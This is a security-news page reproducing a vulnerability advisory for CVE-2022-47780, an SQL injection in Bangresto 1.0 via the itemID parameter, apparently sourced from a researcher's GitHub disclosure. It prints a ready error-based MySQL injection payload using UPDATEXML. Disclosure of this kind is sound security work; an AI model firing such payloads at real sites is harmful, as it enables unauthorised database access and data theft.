Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-47780: CVE-nu11secur1ty/vendors/Bangresto at main · nu11secur1ty/CVE-nu11secur1ty

SQL Injection vulnerability in Bangresto 1.0 via the itemID parameter.

CVE
#sql#vulnerability

The itemID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the itemID parameter, and a database error message was returned. The attacker can be stooling all information from the database of this application.

— Parameter: itemID (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 —

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda